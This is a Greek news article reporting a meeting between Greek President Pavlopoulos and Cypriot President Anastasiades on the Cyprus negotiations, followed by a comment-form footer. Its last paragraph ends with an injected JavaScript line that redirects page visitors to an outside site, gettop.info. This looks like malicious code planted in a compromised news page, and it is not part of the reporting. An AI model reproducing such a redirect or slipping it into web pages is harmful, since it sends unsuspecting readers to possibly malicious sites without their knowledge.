Συνάντηση Παυλόπουλου – Αναστασιάδη για το Κυπριακό

0
7

 

Λίγες ώρες πριν από την έναρξη της Ευρωμεσογειακής Συνόδου ηγετών στο Ζάππειο Μέγαρο ο πρόεδρος της Κύπρου Νίκος Αναστασιάδης συναντήθηκε με τον Έλληνα πρόεδρο Προκόπη Παυλόπουλο και συζήτησαν για τις τελευταίες εξελίξεις στο Κυπριακό και την πορεία των διαπραγματεύσεων.

Ο κ. Παυλόπουλος εξέφρασε την αμέριστη συμπαράσταση του ελληνικού λαού για την επίλυση του Κυπριακού και υπογράμμισε ότι η στάση αυτή αποτελεί και χρέος της Ελλάδας που απορρέει από το Ευρωπαϊκό Δίκαιο και την αλληλεγγύη που πρέπει να επιδεικνύουν τα κράτη-μέλη μεταξύ τους, κάλεσε δε τα υπόλοιπα μέλη της ΕΕ να επιδείξουν την ίδια συμπεριφορά προς την Κυπριακή Δημοκρατία, που αποτελεί ισότιμο μέλος της ΕΕ και της Ευρωζώνης.

Επιπλέον, ο Πρόεδρος της Ελληνικής Δημοκρατίας επανέλαβε τη σταθερή θέση της Αθήνας για εξεύρεση λύσης στο Κυπριακό σύμφωνης με το διεθνές δίκαιο και το ευρωπαϊκό κεκτημένο και επεσήμανε ότι η λύση δεν μπορεί να περιλαμβάνει εγγυήσεις και στρατεύματα κατοχής.

Από την πλευρά του ο κ. Αναστασιάδης εξέφρασε την ευγνωμοσύνη του κυπριακού λαού για την άδολη συμπαράσταση της Ελλάδας στις προσπάθειες για την επίλυση του Κυπριακού και τόνισε ότι στόχος της Λευκωσίας είναι η επίτευξη λύσης που θα ανταποκρίνεται στις ανησυχίες και των δυο κοινοτήτων και θα οδηγήσει σε ένα κράτος λειτουργικό και βιώσιμο.

Αναφερόμενος στην πορεία των διαπραγματεύσεων έκανε λόγο για συγκρατημένη αισιοδοξία και υπογράμμισε ότι εξακολουθούν να υπάρχουν διαφορές και προβλήματα που, εάν δεν ξεπεραστούν, δεν μπορούμε να οδηγηθούμε σε λύση, ενώ επισήμανε για μια ακόμη φορά την ανάγκη για δημιουργία ενός ανεξάρτητου κυρίαρχου κράτους και όχι μετατροπή της κρατικής υπόστασης της Κυπριακής Δημοκρατίας σε ένα προτεκτοράτο της οποιαδήποτε δύναμης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here